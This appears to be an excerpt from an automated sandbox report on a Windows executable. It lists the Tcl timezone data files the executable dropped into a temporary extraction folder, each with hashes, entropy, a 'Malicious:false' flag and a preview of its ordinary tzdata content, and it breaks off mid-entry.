                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Hobart) {. {-9223372036854775808 35356 0 LMT}. {-2345795356 36000 0 AEST}. {-1680508800 39600 1 AEDT}. {-1669892400 39600 0 AEDT}. {-1665392400 36000 0 AEST}. {-883641600 39600 1 AEDT}. {-876128400 36000 0 AEST}. {-860400000 39600 1 AEDT}. {-844678800 36000 0 AEST}. {-828345600 39600 1 AEDT}. {-813229200 36000 0 AEST}. {-94730400 36000 0 AEST}. {-71136000 39600 1 AEDT}. {-55411200 36000 0 AEST}. {-37267200 39600 1 AEDT}. {-25776000 36000 0 AEST}. {-5817600 39600 1 AEDT}. {5673600 36000 0 AEST}. {25632000 39600 1 AEDT}. {37728000 36000 0 AEST}. {57686400 39600 1 AEDT}. {67968000 36000 0 AEST}. {89136000 39600 1 AEDT}. {100022400 36000 0 AEST}. {120585600 39600 1 AEDT}. {131472000 36000 0 AEST}. {152035200 39600 1 AEDT}. {162921600 36000 0 AEST}. {183484800 39600 1 AEDT}. {194976000 36000 0 AEST}. {215539200 39600 1 AEDT}. {226

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Australia\LHI

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):194
                                                                                                                                                                                                                                                    Entropy (8bit):4.865814837459796
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9IZaM3yIoGEowFVAIgjG/L2DCkx/2DCPGT:MBaIMje0QL2a7
                                                                                                                                                                                                                                                    MD5:1221FC8932CA3DCA431304AF660840F0
                                                                                                                                                                                                                                                    SHA1:5E023E37D98EA1321B10D36A79B26DF1A017F9D5
                                                                                                                                                                                                                                                    SHA-256:EB8FDBCFDE9E2A2AA829E784D402966F61A5BF6F2034E0CB06A24FACB5B87874
                                                                                                                                                                                                                                                    SHA-512:EB19FE74DC13456D0F9F1EDC9C444793A4011D3B65ADF6C7E7A405504079EB3A0C27F69DDA662F797FE363948E93833422F5DC3C1891AA7D414B062BE4DD3887
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Lord_Howe)]} {. LoadTimeZoneFile Australia/Lord_Howe.}.set TZData(:Australia/LHI) $TZData(:Australia/Lord_Howe).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Australia\Lindeman

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):796
                                                                                                                                                                                                                                                    Entropy (8bit):4.1890768067004
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:MBp52gCmdHVP/+tCdd8xdsWz9ag5J4UVdKcWW3ty/yJATUJrRxC:cQgCeRUVfl7w
                                                                                                                                                                                                                                                    MD5:08E88B2169BC76172E40515F9DA2C147
                                                                                                                                                                                                                                                    SHA1:5C03B7C9748E63C2B437C97F8ED923A9F3E374E7
                                                                                                                                                                                                                                                    SHA-256:9E3558C8514E97274D9F938E9841C5E3355E738BBD55BCB17FA27FF0E0276AEA
                                                                                                                                                                                                                                                    SHA-512:39E10639C97DE82428818B9C5D059BA853A17113351BAEE2512806AC3066EDDF0294859519AFBE425E0D1315B1A090F84C08CEFEDCE2A3D3A38EEF782234D8C4
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Lindeman) {. {-9223372036854775808 35756 0 LMT}. {-2366790956 36000 0 AEST}. {-1672567140 39600 1 AEDT}. {-1665392400 36000 0 AEST}. {-883641600 39600 1 AEDT}. {-876128400 36000 0 AEST}. {-860400000 39600 1 AEDT}. {-844678800 36000 0 AEST}. {-828345600 39600 1 AEDT}. {-813229200 36000 0 AEST}. {31500000 36000 0 AEST}. {57686400 39600 1 AEDT}. {67968000 36000 0 AEST}. {625593600 39600 1 AEDT}. {636480000 36000 0 AEST}. {657043200 39600 1 AEDT}. {667929600 36000 0 AEST}. {688492800 39600 1 AEDT}. {699379200 36000 0 AEST}. {709912800 36000 0 AEST}. {719942400 39600 1 AEDT}. {731433600 36000 0 AEST}. {751996800 39600 1 AEDT}. {762883200 36000 0 AEST}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Australia\Lord_Howe

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7251
                                                                                                                                                                                                                                                    Entropy (8bit):3.8305538870955127
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:zVKHN3t5NY3aUeFANqlbWYk3Fb0r/Dnuj7v28P18qrc/JFmiRQTIPw3ar:zIyTNqlbWYk1bU7PR
                                                                                                                                                                                                                                                    MD5:B23F257BC30FD057ABD04C64A3EF02C1
                                                                                                                                                                                                                                                    SHA1:B35BE3C39F87CCF2E9786D024F9AE7850700FC47
                                                                                                                                                                                                                                                    SHA-256:CD4FF9F07D4BB675EA0D3559436965DDE2899A5BB7F732D78E90D7AF77E426FF
                                                                                                                                                                                                                                                    SHA-512:5668B65099BF5D50F1346DFCE4EE0193FD85E5BE3A4B148C8ECDF042E189EF5A56168DE53A0484D1BF0584875113375835A73DE7BA3E0A8C2ED16BB147DE3DCB
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Lord_Howe) {. {-9223372036854775808 38180 0 LMT}. {-2364114980 36000 0 AEST}. {352216800 37800 0 LHST}. {372785400 41400 1 LHDT}. {384273000 37800 0 LHST}. {404839800 41400 1 LHDT}. {415722600 37800 0 LHST}. {436289400 41400 1 LHDT}. {447172200 37800 0 LHST}. {467739000 41400 1 LHDT}. {478621800 37800 0 LHST}. {499188600 39600 1 LHDT}. {511282800 37800 0 LHST}. {530033400 39600 1 LHDT}. {542732400 37800 0 LHST}. {562087800 39600 1 LHDT}. {574786800 37800 0 LHST}. {594142200 39600 1 LHDT}. {606236400 37800 0 LHST}. {625591800 39600 1 LHDT}. {636476400 37800 0 LHST}. {657041400 39600 1 LHDT}. {667926000 37800 0 LHST}. {688491000 39600 1 LHDT}. {699375600 37800 0 LHST}. {719940600 39600 1 LHDT}. {731430000 37800 0 LHST}. {751995000 39600 1 LHDT}. {762879600 37800 0 LHST}. {783444600 39600 1 LHDT}. {794329200 37800 0 LHST}. {8148

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Australia\Melbourne

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8069
                                                                                                                                                                                                                                                    Entropy (8bit):3.769669933493392
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:sriG+vi8GyddsYtLhbVXd33cZF7bLaE9DTtM/m7eeYWlQOZIeVUF:sr/2tLhbVXdnPQler
                                                                                                                                                                                                                                                    MD5:E38FDAF8D9A9B1D6F2B1A8E10B9886F4
                                                                                                                                                                                                                                                    SHA1:6188BD62E94194DB469BE93224A396D08A986D4D
                                                                                                                                                                                                                                                    SHA-256:399F727CB39D90520AD6AE78A8963F918A490A813BC4FF2D94A37B0315F52D99
                                                                                                                                                                                                                                                    SHA-512:79FDCFF5066636C3218751C8B2B658C6B7A6864264DCC28B47843EAEFDD5564AC5E4B7A66E3D1B0D25DB86D6C6ED55D1599F1FE2C169085A8769E037E0E954BE
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Melbourne) {. {-9223372036854775808 34792 0 LMT}. {-2364111592 36000 0 AEST}. {-1672567140 39600 1 AEDT}. {-1665392400 36000 0 AEST}. {-883641600 39600 1 AEDT}. {-876128400 36000 0 AEST}. {-860400000 39600 1 AEDT}. {-844678800 36000 0 AEST}. {-828345600 39600 1 AEDT}. {-813229200 36000 0 AEST}. {31500000 36000 0 AEST}. {57686400 39600 1 AEDT}. {67968000 36000 0 AEST}. {89136000 39600 1 AEDT}. {100022400 36000 0 AEST}. {120585600 39600 1 AEDT}. {131472000 36000 0 AEST}. {152035200 39600 1 AEDT}. {162921600 36000 0 AEST}. {183484800 39600 1 AEDT}. {194976000 36000 0 AEST}. {215539200 39600 1 AEDT}. {226425600 36000 0 AEST}. {246988800 39600 1 AEDT}. {257875200 36000 0 AEST}. {278438400 39600 1 AEDT}. {289324800 36000 0 AEST}. {309888000 39600 1 AEDT}. {320774400 36000 0 AEST}. {341337600 39600 1 AEDT}. {352224000 36000 0 AEST}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Australia\NSW

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):185
                                                                                                                                                                                                                                                    Entropy (8bit):4.8456659038249
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq/xJjLHVAIgoXjLSt2QWCCjREeQWCCjLu:SlSWB9IZaM3yI9HVAIgmo2DC5eDCyu
                                                                                                                                                                                                                                                    MD5:AE3539C49047BE3F8ABAD1AC670975F1
                                                                                                                                                                                                                                                    SHA1:62CD5C3DB618B9FE5630B197AB3A9729B565CA41
                                                                                                                                                                                                                                                    SHA-256:938A557C069B8E0BE8F52D721119CBA9A694F62CF8A7A11D68FD230CC231E17C
                                                                                                                                                                                                                                                    SHA-512:6F143B50C1EEC1D77F87DD5B0FFCF6625800E247400AA58361748BFEA0626E2CDA9C3FD2A4C269B3218D28FF1FB8533F4F6741F6B2C5E83F9C84A5882C86716B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Sydney)]} {. LoadTimeZoneFile Australia/Sydney.}.set TZData(:Australia/NSW) $TZData(:Australia/Sydney).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Australia\North

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):187
                                                                                                                                                                                                                                                    Entropy (8bit):4.780732237583773
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq/xJjboFVAIgoXjbhvN2QWCCjsrQWCCjb/:SlSWB9IZaM3yIiFVAIgg2DCZrDCy
                                                                                                                                                                                                                                                    MD5:70EF2A87B4538500CFADB63B62DDCBC6
                                                                                                                                                                                                                                                    SHA1:8D737E6E8D37323D3B41AD419F1CA9B5991E2E99
                                                                                                                                                                                                                                                    SHA-256:59B67F2C7C62C5F9A93767898BA1B51315D2AC271075FAFC1A24313BB673FF27
                                                                                                                                                                                                                                                    SHA-512:E148FC32894A7138D1547910CBD590891120CE5FB533D1348243539C35CE2994DC9F3E7B6A952BF871882C8D6ECA47E13E08AF59AB52A55F790508F2DB9B0EB6
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Darwin)]} {. LoadTimeZoneFile Australia/Darwin.}.set TZData(:Australia/North) $TZData(:Australia/Darwin).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Australia\Perth

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):714
                                                                                                                                                                                                                                                    Entropy (8bit):4.257489685002088
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:MBp52wmdHCBdPmzKfkzm2z75izhNhaP0YqozBqmjj4zl5fV59Bhg8lfU:cQweCBpYd7IzrhaMYR8mP4znhf9U
                                                                                                                                                                                                                                                    MD5:B354B9525896FDED8769CF5140E76FFF
                                                                                                                                                                                                                                                    SHA1:8494E182E3803F2A6369261B4B4EAC184458ECC4
                                                                                                                                                                                                                                                    SHA-256:C14CAAD41E99709ABF50BD7F5B1DAFE630CA494602166F527DBDA7C134017FB0
                                                                                                                                                                                                                                                    SHA-512:717081F29FBACEE2722399DD627045B710C14CF6021E4F818B1768AF972061232412876872F113C468446D79A366D7FFD2E852563DC44A483761D78C7A16F74A
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Perth) {. {-9223372036854775808 27804 0 LMT}. {-2337925404 28800 0 AWST}. {-1672559940 32400 1 AWDT}. {-1665385200 28800 0 AWST}. {-883634400 32400 1 AWDT}. {-876121200 28800 0 AWST}. {-860392800 32400 1 AWDT}. {-844671600 28800 0 AWST}. {-836470800 32400 0 AWST}. {152042400 32400 1 AWDT}. {162928800 28800 0 AWST}. {436298400 32400 1 AWDT}. {447184800 28800 0 AWST}. {690314400 32400 1 AWDT}. {699386400 28800 0 AWST}. {1165082400 32400 1 AWDT}. {1174759200 28800 0 AWST}. {1193508000 32400 1 AWDT}. {1206813600 28800 0 AWST}. {1224957600 32400 1 AWDT}. {1238263200 28800 0 AWST}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Australia\Queensland

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):198
                                                                                                                                                                                                                                                    Entropy (8bit):4.75392731256171
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9IZaM3yIaWhvFVAIgPWzCxL2DCoRWJvFBx+DC7W6:MBaIMjoTL2rOvFey
                                                                                                                                                                                                                                                    MD5:D12C6F15F8BFCA19FA402DAE16FC9529
                                                                                                                                                                                                                                                    SHA1:0869E6D11681D74CC3301F4538D98A225BE7C2E1
                                                                                                                                                                                                                                                    SHA-256:77EA0243A11D187C995CE8D83370C6682BC39D2C39809892A48251123FF19A1E
                                                                                                                                                                                                                                                    SHA-512:A98D1AF1FC3E849CCF9E9CC090D3C65B7104C164762F88B6048EA2802F17D635C2E66BE2661338C1DD604B550A267678245DE867451A1412C4C06411A21BE3A9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Brisbane)]} {. LoadTimeZoneFile Australia/Brisbane.}.set TZData(:Australia/Queensland) $TZData(:Australia/Brisbane).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Australia\South

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):193
                                                                                                                                                                                                                                                    Entropy (8bit):4.701653352722385
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9IZaM3yIDRpGvFVAIgSRFL2DCa7QDCuRpv:MBaIMjdp5YFL23QHpv
                                                                                                                                                                                                                                                    MD5:23671880AC24D35F231E2FCECC1A5E3A
                                                                                                                                                                                                                                                    SHA1:5EE2EFD5ADE268B5114EB02FDA77F4C5F507F3CB
                                                                                                                                                                                                                                                    SHA-256:9823032FFEB0BFCE50B6261A848FE0C07267E0846E9F7487AE812CEECB286446
                                                                                                                                                                                                                                                    SHA-512:E303C7DE927E7BAA10EE072D5308FEE6C4E9B2D69DDD8EF014ED60574E0855EE803FE19A7CB31587E62CAE894C087D47A91A130213A24FCCD152736D82F55AB1
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Adelaide)]} {. LoadTimeZoneFile Australia/Adelaide.}.set TZData(:Australia/South) $TZData(:Australia/Adelaide).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Australia\Sydney

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8066
                                                                                                                                                                                                                                                    Entropy (8bit):3.763781985138297
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:GZCiG+CiRyddsYtLhbVXd33cZF7bLaE9DTtM/m7eeYWlQOZIeVUF:GZCm2tLhbVXdnPQler
                                                                                                                                                                                                                                                    MD5:B3498EEA194DDF38C732269A47050CAA
                                                                                                                                                                                                                                                    SHA1:C32B703AA1FA34D890D151300A2B21E0FA8F55D3
                                                                                                                                                                                                                                                    SHA-256:0EE9BE0F0D6EC0CE10DEA1BE7A9F494C74B747418E966B85EC1FFB15F6F22A4F
                                                                                                                                                                                                                                                    SHA-512:A9419B797B1518AAEEE27A1796D0D024847F7A61D26238F1643EBD6131A6B36007FBABD9E766C3D4ED61B006FD31FC4555CB54B8681E7DBDEC26B38144D64BC9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Sydney) {. {-9223372036854775808 36292 0 LMT}. {-2364113092 36000 0 AEST}. {-1672567140 39600 1 AEDT}. {-1665392400 36000 0 AEST}. {-883641600 39600 1 AEDT}. {-876128400 36000 0 AEST}. {-860400000 39600 1 AEDT}. {-844678800 36000 0 AEST}. {-828345600 39600 1 AEDT}. {-813229200 36000 0 AEST}. {31500000 36000 0 AEST}. {57686400 39600 1 AEDT}. {67968000 36000 0 AEST}. {89136000 39600 1 AEDT}. {100022400 36000 0 AEST}. {120585600 39600 1 AEDT}. {131472000 36000 0 AEST}. {152035200 39600 1 AEDT}. {162921600 36000 0 AEST}. {183484800 39600 1 AEDT}. {194976000 36000 0 AEST}. {215539200 39600 1 AEDT}. {226425600 36000 0 AEST}. {246988800 39600 1 AEDT}. {257875200 36000 0 AEST}. {278438400 39600 1 AEDT}. {289324800 36000 0 AEST}. {309888000 39600 1 AEDT}. {320774400 36000 0 AEST}. {341337600 39600 1 AEDT}. {352224000 36000 0 AEST}. {3

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Australia\Tasmania

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):190
                                                                                                                                                                                                                                                    Entropy (8bit):4.7264864039237215
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq/xJjKD4YFedVAIgoXjKgVAt2QWCCjiiieQWCCjKDvn:SlSWB9IZaM3yI4DVyVAIgxkAt2DC3ne0
                                                                                                                                                                                                                                                    MD5:C7C9CDC9EC855D2F0C23673FA0BAFFB6
                                                                                                                                                                                                                                                    SHA1:4C79E1C17F418CEE4BE8F638F34201EE843D8E28
                                                                                                                                                                                                                                                    SHA-256:014B3D71CE6BD77AD653047CF185EA03C870D78196A236693D7610FED7F30B6F
                                                                                                                                                                                                                                                    SHA-512:79AE11CE076BFB87C0AAD35E9AF6E760FC592F1D086EB78E6DF88744F502ED4248853A0EAD72ADA8EA9583161925802EE5E46E3AA8CE8CF873852C26B4FDC05B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Hobart)]} {. LoadTimeZoneFile Australia/Hobart.}.set TZData(:Australia/Tasmania) $TZData(:Australia/Hobart).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Australia\Victoria

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):199
                                                                                                                                                                                                                                                    Entropy (8bit):4.7697171393457936
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9IZaM3yIvFfkvFVAIgoFFL2DCzyQDCMFB:MBaIMj9fHaFL2xQzB
                                                                                                                                                                                                                                                    MD5:BD2EA272B8DF472E29B7DD0506287E92
                                                                                                                                                                                                                                                    SHA1:55BF3A3B6398F9FF1DB3A46998A4EFF44F6F325C
                                                                                                                                                                                                                                                    SHA-256:EE35DF8BBCD6A99A5550F67F265044529BD7AF6A83087DD73CA0BE1EE5C8BF51
                                                                                                                                                                                                                                                    SHA-512:82B18D2C9BA7113C2714DC79A87101FFB0C36E5520D61ADEAB8A31AD219E51A6402A6C8A8FD7120A330FE8847FF8F083397A1BF5889B73484FBAA6F99497DE48
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Melbourne)]} {. LoadTimeZoneFile Australia/Melbourne.}.set TZData(:Australia/Victoria) $TZData(:Australia/Melbourne).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Australia\West

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):183
                                                                                                                                                                                                                                                    Entropy (8bit):4.781808870279912
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq/xJjXFedVAIgoXjbOAt2QWCCjH0QWCCj5:SlSWB9IZaM3yIYVAIg9At2DC00DCa
                                                                                                                                                                                                                                                    MD5:9E0EF0058DDA86016547F2BFE421DE74
                                                                                                                                                                                                                                                    SHA1:5DB6AEAC6B0A42FEAE28BB1A45679BC235F4E5BF
                                                                                                                                                                                                                                                    SHA-256:FC952BE48F11362981CDC8859F9C634312E5805F2F1513159F25AEFCE664867C
                                                                                                                                                                                                                                                    SHA-512:C60E5A63378F8424CE8D862A575DFE138646D5E88C6A34562A77BEC4B34EA3ED3085424E2130E610197164C7E88805DC6CDE46416EB45DC256F387F632F48CA7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Perth)]} {. LoadTimeZoneFile Australia/Perth.}.set TZData(:Australia/West) $TZData(:Australia/Perth).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Australia\Yancowinna

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):207
                                                                                                                                                                                                                                                    Entropy (8bit):4.871861105493913
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9IZaM3yIcKCFVAIgJKfF2DCkuM0DC9Kl:MBaIMjcKCQJKt2kVSKl
                                                                                                                                                                                                                                                    MD5:5C3CED24741704A0A7019FA66AC0C0A1
                                                                                                                                                                                                                                                    SHA1:88C7AF3B22ED01ED99784C3FAB4F5112AA4659F3
                                                                                                                                                                                                                                                    SHA-256:71A56C71CC30A46950B1B4D4FBB12CB1CBAA24267F994A0F223AE879F1BB6EEC
                                                                                                                                                                                                                                                    SHA-512:771A7AC5D03DD7099F565D6E926F7B97E8A7BA3795339D3FD78F7C465005B55388D8CC30A62978042C354254E1BA5467D0832C0D29497E33D6EF1DA217528806
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Broken_Hill)]} {. LoadTimeZoneFile Australia/Broken_Hill.}.set TZData(:Australia/Yancowinna) $TZData(:Australia/Broken_Hill).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Brazil\Acre

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):189
                                                                                                                                                                                                                                                    Entropy (8bit):4.84045343046357
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0sMhS4edVAIg20sMhStQ1bNW1h4IAcGEsMhSA:SlSWB9IZaM3y7thtedVAIgpthKQxWh4y
                                                                                                                                                                                                                                                    MD5:DF4D752BEEAF40F081C03B4572E9D858
                                                                                                                                                                                                                                                    SHA1:A83B5E4C3A9EB0CF43263AFF65DB374353F65595
                                                                                                                                                                                                                                                    SHA-256:1B1AD73D3FE403AA1F939F05F613F6A3F39A8BA49543992D836CD6ED14B92F2C
                                                                                                                                                                                                                                                    SHA-512:1F96F1D8AACD6D37AC13295B345E761204DAE6AA1DF4894A11E00857CCB7247FA7BEBD22407EA5D13193E2945EB1F4210E32669069F157F1459B26643A67F445
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Rio_Branco)]} {. LoadTimeZoneFile America/Rio_Branco.}.set TZData(:Brazil/Acre) $TZData(:America/Rio_Branco).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Brazil\DeNoronha

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):185
                                                                                                                                                                                                                                                    Entropy (8bit):4.826795532956443
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0wKy4oedVAIg20wK+F1bIAJl0IAcGEwKyvn:SlSWB9IZaM3y7/rDdVAIgp/mxIAE90/8
                                                                                                                                                                                                                                                    MD5:86B9E49F604AD5DBC4EC6BA735A513C7
                                                                                                                                                                                                                                                    SHA1:BE3AB32339DF9830D4F445CCF883D79DDBA8708E
